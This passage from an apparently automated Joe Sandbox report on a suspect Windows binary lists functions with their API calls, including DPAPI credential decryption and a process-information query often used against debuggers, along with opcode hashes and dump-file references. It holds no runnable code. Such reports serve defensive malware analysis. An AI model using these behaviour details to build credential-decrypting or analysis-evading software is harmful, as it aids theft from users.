Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID: DPAPI
API String ID: 2068576380-1690256801
Opcode ID: 72775fdf0653e59d4bbe275b74b309887bc453f4a0bc84bd9e8a2c84f0126a33
Instruction ID: da6d6b3b8524742c7fc824f7c4b24715dc6daa0270fed113ec9d118ef317b263
Opcode Fuzzy Hash: 72775fdf0653e59d4bbe275b74b309887bc453f4a0bc84bd9e8a2c84f0126a33
Instruction Fuzzy Hash: 6201E8B6A01218FFCB00DFA8D8848AEBBB9FB48714B144066ED05E7310D7709E44CBA0

Function 00D63AB9 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,00000000,0000000F,0000000F,?,00D5543A,?,?,?,?), ref: 00D63AD9
GetProcessHeap.KERNEL32(00000000,?,?,?,00000000), ref: 00D63AE6
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00D63AED

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: dab5f52321e92dfa00e86c050191464480d3fbe001694dc2013baed128ba2286
Instruction ID: 88bdfe1bc119463f9571454819c0dd67569b6802a8470ab49cc51b40556e4974
Opcode Fuzzy Hash: dab5f52321e92dfa00e86c050191464480d3fbe001694dc2013baed128ba2286
Instruction Fuzzy Hash: 86011670501208BFEF118FA5DC89DBA7BBAFF49364B284569F85592220D7319A90EB60

Function 00D6D8CB Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,00D6DD86,?), ref: 00D6D920
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00D6DD86,?), ref: 00D6D92E

Part of subcall function 00D6D10C: FileTimeToSystemTime.KERNEL32(?,?,?,?,00D6D9F3,?,?,?,?,?,?,?,?,?,?,00D6DD96), ref: 00D6D124

Part of subcall function 00D6D0E8: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D6D105

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: 18d9c79e2cc87eaab490c2c3ba149f93925dad0ac307e65f23ac33d926e393a0
Instruction ID: 3e0dbc40543c9e035ead7ef31abbcc52a0cb4de409aa8c1b6aae2506deb50dd3
Opcode Fuzzy Hash: 18d9c79e2cc87eaab490c2c3ba149f93925dad0ac307e65f23ac33d926e393a0
Instruction Fuzzy Hash: 8A21E6B1D002098FDF44DF69D9816AE7BF5FB08300F1440AAE948EB216E7358945DFB0

Function 00D5144B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 00D5145D
NtQueryInformationProcess.NTDLL(00000000), ref: 00D51464

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 646cf0c33b563aa12190c72efd1372bea1084e3ba9e057b81288da9f2653456c
Instruction ID: fb26617d77e17969fc4da49cb4e58537ccf313f8e0f4deffa27d22d89f3c2713
Opcode Fuzzy Hash: 646cf0c33b563aa12190c72efd1372bea1084e3ba9e057b81288da9f2653456c
Instruction Fuzzy Hash: 21E05B75651308F7FF109BE0DD06B5E73BCE70074AF145155AA02E20D0DAB4DA05D775

Function 00D7CDD6 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002CA41,00000001), ref: 00D7CDEF

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: dc4fe44a33fbaadafed4233beaa2638cba10168fa4a944985ab21357cdcb1886
Instruction ID: debf16efd108803698b10d5a4932fa7506d33d258e9b123dcd577993d3da78bb
Opcode Fuzzy Hash: dc4fe44a33fbaadafed4233beaa2638cba10168fa4a944985ab21357cdcb1886
Instruction Fuzzy Hash: 91D05E719607004FD7204F3499497E177E0FB10F16F20994DDE96850C1E6B4A58A8610

Function 00D78EAE Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00028E6C), ref: 00D78EB3

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f3afdf08f833cb2325141ffae4e06b1663204644c0651056e22e0af3641990d1
Instruction ID: 01a34be90551b2b35afae45d813cd1c930f07f1f0f8aeff3aeecc1eb14768631
Opcode Fuzzy Hash: f3afdf08f833cb2325141ffae4e06b1663204644c0651056e22e0af3641990d1
Instruction Fuzzy Hash: 879002B87A13004E86001BB05D4D54525945A686127C14A50B106C4658EF5150496631

Function 00D7E5AE Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 014e6c93680dca41cd3ccbe44e31f8c5e063fe529bda502b506f9a9db1ee9884
Instruction ID: 19918d26fd8220cd12a35bb211a8b591b4a0a537a1a49c1ac685270a7d37a267
Opcode Fuzzy Hash: 014e6c93680dca41cd3ccbe44e31f8c5e063fe529bda502b506f9a9db1ee9884
Instruction Fuzzy Hash: 4F02A033D496B24B8B764EB9449062A7FA06F05B5031FC6E9DDC83F197E212ED0696F0

Function 00D7F59B Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction ID: 604379227e2014424cdec346b302c84460a112485986fed0ea449d1113fe4ddd
Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
Instruction Fuzzy Hash: E5C15F73D1A5B2458B36462D481823FEF626F91B4131FC3E5DCD83F28AE226AD1695F0

Function 00D7F1B3 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction ID: f4ec39a2e2d6e2ef07496ca733cac6371987a442a45e1d32171cdd27d5d1ff49
Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
Instruction Fuzzy Hash: 79C15073D1A5B2468B35462D485823BEF626F91B4131FC3E5DCD83F28AE226AD0695F0

Function 00D7EDE1 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction ID: 7d85f1c05cf0cc2fd0cca9612c5858ba146d67dc1cf530acdf1ddf176eb652d0
Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: FEC16173D0A5B2458B36462D481823EFF626F91B4131FC3E5DCD83F28AE626AD0695F0

Function 00D7EA43 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 02dd35b66412e40820b8ee55916efb69934bcdc43a76e6f370d8eb2cec60b043
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: 92B16373D0E5B2458B36862D485823BEF626F95B4131FC3E5DCD83F289E622AD0695F0

Function 00D6ACEC Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 865bfd05b8feb179f84481aa35d02ed716355be0970faba8d5fd6bbe8eb01724
Instruction ID: a30dbe453c90e7cf5abea2ab2bf4462ae46d6915cc67c8cc1e62ae0377fc8354
Opcode Fuzzy Hash: 865bfd05b8feb179f84481aa35d02ed716355be0970faba8d5fd6bbe8eb01724
Instruction Fuzzy Hash: FC51D3739042159BEB18CF58C4806E9B7B1FF94305F2944BED89AEF286EB309941CF61

Function 00D6CEF4 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d84b7aaabaad14efb9c47e703007f3a21a51de05549f98b3108bbce3e51fbe23
Instruction ID: 8a0085b17ac48e440bf462a2d0edddaa78a2e25291c7517b7eb980f71b52a896
Opcode Fuzzy Hash: d84b7aaabaad14efb9c47e703007f3a21a51de05549f98b3108bbce3e51fbe23
Instruction Fuzzy Hash: 3921EB316B8BE206C7554BF8FCC036267D1CBCD32636D8265EEB0C9261C16DD622C670

Function 00D5118E Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582453730.0000000000D8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000E36000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000EEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582476285.0000000000F91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582871830.0000000000FA3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1c00e2a82f7c398379ac70e6282f21e53ce7f4c3c7edf1898dbf7692e7f549b
Instruction ID: 2516faad885883397ebc2b051fd770929e114e8f0eab75fee355b8c570fb26a9
Opcode Fuzzy Hash: d1c00e2a82f7c398379ac70e6282f21e53ce7f4c3c7edf1898dbf7692e7f549b
Instruction Fuzzy Hash: 042180B5D0021A8FCB04CFA9C4816EEFBF4BB48320F54846EC956F3350E634AA448FA4

Function 00D69D78 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2582394776.0000000000D51000.00000080.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.2582380982.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2582434810.0000000000D81000.00000002.00000001.01000000.00000003.sdmpDownload File
